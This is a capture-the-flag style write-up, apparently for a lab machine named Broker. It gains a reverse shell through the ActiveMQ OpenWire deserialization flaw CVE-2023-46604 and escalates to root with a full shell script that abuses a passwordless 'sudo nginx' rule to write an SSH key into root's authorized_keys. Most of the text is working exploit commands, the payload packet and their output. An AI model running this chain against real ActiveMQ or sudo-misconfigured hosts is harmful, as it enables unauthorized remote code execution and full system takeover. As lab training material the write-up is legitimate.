Proof of Concept

10.129.230.87

Nmap

PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
1883/tcp  open  mqtt
5672/tcp  open  amqp
8161/tcp  open  patrol-snmp
34591/tcp open  unknown
61613/tcp open  unknown
61614/tcp open  unknown
61616/tcp open  unknown

Initial Access

Browsing to the web service on port 80 brings up a login prompt; the default credentials admin/admin are accepted.

Connecting to port 61616 (the OpenWire transport) makes the broker send its WireFormatInfo banner, whose ProviderVersion field shows ActiveMQ 5.15.15 is running:

┌──(kali㉿kali)-[~/Broker]
└─$ nc 10.129.230.87 61616
<ActiveMQ
         *
          TcpNoDelayEnabledSizePrefixDisabled	CacheSize
                                                         ProviderName  ActiveMQStackTraceEnabledPlatformDetails	Java
                                                                                                                    CacheEnabledTightEncodingEnabled
                                                                                                                                                    MaxFrameSize@MaxInactivityDurationu0 MaxInactivityDurationInitalDelay'ProviderVersion	5.15.15
 

This version is affected by an unauthenticated remote code execution bug, CVE-2023-46604. When OpenWire unmarshals an ExceptionResponse, the broker instantiates whatever "exception" class name the peer supplies and passes the "message" string to its String constructor, without checking that the class is actually a Throwable. Sending org.springframework.context.support.ClassPathXmlApplicationContext with a URL as the message makes the broker fetch that Spring XML and instantiate the beans it defines, so a java.lang.ProcessBuilder bean with init-method="start" runs an arbitrary command. Fixed in 5.15.16, 5.16.7, 5.17.6 and 5.18.3.

Download the PoC

┌──(kali㉿kali)-[~/Broker]
└─$ git clone https://github.com/strikoder/CVE-2023-46604-ActiveMQ-RCE-Python.git
Cloning into 'CVE-2023-46604-ActiveMQ-RCE-Python'...
remote: Enumerating objects: 31, done.
remote: Counting objects: 100% (31/31), done.
remote: Compressing objects: 100% (26/26), done.
remote: Total 31 (delta 10), reused 12 (delta 3), pack-reused 0 (from 0)
Receiving objects: 100% (31/31), 1.65 MiB | 4.54 MiB/s, done.
Resolving deltas: 100% (10/10), done.

Start an nc listener

┌──(kali㉿kali)-[~/Broker]
└─$ rlwrap nc -nlvp 1001
listening on [any] 1001 ...

Generated the malicious XML file and started a simple HTTP server in the same folder (to serve the XML payload)

┌──(kali㉿kali)-[~/Broker/CVE-2023-46604-ActiveMQ-RCE-Python]
└─$ python3 generate_poc.py -i 10.10.14.248 -p 1001
[*] PoC XML written to poc-linux.xml
 
┌──(kali㉿kali)-[~/Broker/CVE-2023-46604-ActiveMQ-RCE-Python]
└─$ python -m http.server 2002
Serving HTTP on 0.0.0.0 port 2002 (http://0.0.0.0:2002/) ...

Ran the exploit against the broker's OpenWire port, pointing it at the URL of the hosted XML

┌──(kali㉿kali)-[~/Broker/CVE-2023-46604-ActiveMQ-RCE-Python]
└─$ python main.py -i 10.129.230.87 -u http://10.10.14.248:2002/poc-linux.xml
 
     _        _   _           __  __  ___        ____   ____ _____
    / \   ___| |_(_)_   _____|  \/  |/ _ \      |  _ \ / ___| ____|
   / _ \ / __| __| \ \ / / _ \ |\/| | | | |_____| |_) | |   |  _|
  / ___ \ (__| |_| |\ V /  __/ |  | | |_| |_____|  _ <| |___| |___
 /_/   \_\___|\__|_| \_/ \___|_|  |_|\__\_\     |_| \_\\____|_____|
 
[*] Target: 10.129.230.87:61616
[*] XML URL: http://10.10.14.248:2002/poc-linux.xml
 
[*] Sending packet: 000000791f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e74657874010026687474703a2f2f31302e31302e31342e3234383a323030322f706f632d6c696e75782e786d6c

The listener receives the reverse shell, running as the activemq service account from the broker's bin directory

┌──(kali㉿kali)-[~/Broker]
└─$ rlwrap nc -nlvp 1001
listening on [any] 1001 ...
connect to [10.10.14.248] from (UNKNOWN) [10.129.230.87] 45862
bash: cannot set terminal process group (878): Inappropriate ioctl for device
bash: no job control in this shell
activemq@broker:/opt/apache-activemq-5.15.15/bin$

Read user.txt

activemq@broker:~$ cat user.txt
cat user.txt
3503a76d733dc7c90b5112a68f9e8680
activemq@broker:~$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b0:83:99 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.129.230.87/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 2066sec preferred_lft 2066sec
    inet6 dead:beef::250:56ff:feb0:8399/64 scope global dynamic mngtmpaddr
       valid_lft 86400sec preferred_lft 14400sec
    inet6 fe80::250:56ff:feb0:8399/64 scope link
       valid_lft forever preferred_lft forever

Privilege Escalation

sudo -l shows that activemq may run /usr/sbin/nginx as root without a password

activemq@broker:~$ sudo -l
sudo -l
Matching Defaults entries for activemq on broker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty
 
User activemq may run the following commands on broker:
    (ALL : ALL) NOPASSWD: /usr/sbin/nginx

nginx -c loads any configuration file we name, and that file can set user root (so the worker processes run as root), serve / as the web root and enable the WebDAV PUT method. The sudo rule therefore gives an arbitrary file write as root, which is enough to drop an SSH public key into /root/.ssh/authorized_keys. Exploit script:

#!/bin/sh
# Abuses "sudo nginx" (NOPASSWD) for an arbitrary file write as root:
# -c loads our config, "user root" makes the worker run as root, and
# dav_methods PUT lets us write anywhere under root /.
echo "[+] Creating configuration..."
cat << EOF > /tmp/nginx_pwn.conf
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
        worker_connections 768;
}
http {
	server {
	        listen 1339;
	        root /;
	        autoindex on;
	        dav_methods PUT;
	}
}
EOF
echo "[+] Loading configuration..."
sudo nginx -c /tmp/nginx_pwn.conf
echo "[+] Generating SSH Key..."
# Interactive; press Enter at the prompts to accept ~/.ssh/id_rsa and no passphrase.
ssh-keygen
echo "[+] Display SSH Private Key for copy..."
cat "$HOME/.ssh/id_rsa"
echo "[+] Add key to root user..."
# The PUT is served by a root worker, so the file lands in /root/.ssh as root.
# --fail makes a rejected write visible instead of silently printing the meter.
curl --fail -X PUT localhost:1339/root/.ssh/authorized_keys -d "$(cat "$HOME/.ssh/id_rsa.pub")"
echo "[+] Use the SSH key to get access"
# Cleanup when done: sudo nginx -c /tmp/nginx_pwn.conf -s stop

Run the script to generate an SSH key pair and push the public key into root's authorized_keys. In the run below nginx reports bind() failures with errno 98 (EADDRINUSE) on port 1339, meaning a worker from an earlier launch was already listening there with the same config; the PUT still succeeds because that existing listener serves it.

activemq@broker:~$ chmod a+x exploit.sh
chmod a+x exploit.sh
 
activemq@broker:~$ ./exploit.sh
./exploit.sh
[+] Creating configuration...
[+] Loading configuration...
nginx: [emerg] bind() to 0.0.0.0:1339 failed (98: Unknown error)
nginx: [emerg] bind() to 0.0.0.0:1339 failed (98: Unknown error)
nginx: [emerg] bind() to 0.0.0.0:1339 failed (98: Unknown error)
nginx: [emerg] bind() to 0.0.0.0:1339 failed (98: Unknown error)
nginx: [emerg] bind() to 0.0.0.0:1339 failed (98: Unknown error)
nginx: [emerg] still could not bind()
[+] Generating SSH Key...
Generating public/private rsa key pair.
Enter file in which to save the key (/home/activemq/.ssh/id_rsa):
Created directory '/home/activemq/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/activemq/.ssh/id_rsa
Your public key has been saved in /home/activemq/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:IDVLuAmjCPAldslFSNlY0nnuUJnYNRe8N9jvApAdfSw activemq@broker
The key's randomart image is:
+---[RSA 3072]----+
|o oo=%B+ +o.oo . |
|.oo+B+=o*  oo E o|
|o..o.oo+   o = o |
|o   o.... o + +  |
|       oS  . . o |
|        .   .   .|
|             . . |
|              . .|
|               . |
+----[SHA256]-----+
[+] Display SSH Private Key for copy...
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
[+] Add key to root user...
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   568    0     0  100   568      0   435k --:--:-- --:--:-- --:--:--  554k
[+] Use the SSH key to get access

Save the private key printed by the script as id_rsa on the attacking host and SSH in as root

┌──(kali㉿kali)-[~/Broker]
└─$ ssh -i id_rsa root@10.129.230.87
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
  System information as of Thu Feb 12 12:53:09 PM UTC 2026
 
  System load:           0.0
  Usage of /:            70.6% of 4.63GB
  Memory usage:          11%
  Swap usage:            0%
  Processes:             158
  Users logged in:       0
  IPv4 address for eth0: 10.129.230.87
  IPv6 address for eth0: dead:beef::250:56ff:feb0:8399
 
 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.
 
   https://ubuntu.com/engage/secure-kubernetes-at-the-edge
 
Expanded Security Maintenance for Applications is not enabled.
 
0 updates can be applied immediately.
 
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
 
root@broker:~#

Read root.txt

root@broker:~# cat root.txt
ae1d9eeb0d8ed8abd6484d05ab09480d
root@broker:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b0:83:99 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.129.230.87/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 2888sec preferred_lft 2888sec
    inet6 dead:beef::250:56ff:feb0:8399/64 scope global dynamic mngtmpaddr
       valid_lft 86400sec preferred_lft 14400sec
    inet6 fe80::250:56ff:feb0:8399/64 scope link
       valid_lft forever preferred_lft forever